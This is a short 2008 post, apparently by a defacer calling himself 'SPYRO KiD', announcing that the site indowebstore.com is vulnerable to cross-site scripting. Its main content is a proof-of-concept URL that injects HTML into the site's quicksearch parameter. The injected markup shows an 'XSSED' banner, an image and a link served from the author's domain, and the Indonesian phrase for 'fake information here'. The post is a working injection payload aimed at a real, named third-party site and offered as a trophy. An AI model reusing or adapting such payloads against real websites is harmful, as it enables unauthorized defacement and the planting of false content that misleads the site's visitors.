IndoWebStore.COM Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Sunday, August 17th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: indowebstore.com XSSED by SPYRO KiD}

indowebstore.com XSSED by SPYRO KiD

POC:

http://www.indowebstore.com/server_page.php?page=quicksearch&sel=%3Ccenter%3EXSSED%3Cbr%3Eby%3Cbr%3ESPYRO%20KiD%3Cbr%3E%3Ca%20href=http://www.spyrozone.net%20target=new%3E%3Cimg%20border=0%20src=http://www.spyrozone.net/sz/www.spyrozone.net_109x63.gif%20alt=http://spyrozone.net%3E%3C/a%3E%3C/center%3E%3Cbr%3EInformasi%20palsu%20disini…%20Informasi%20palsu%20disini…%3Cnoscript%3E


//E.O.F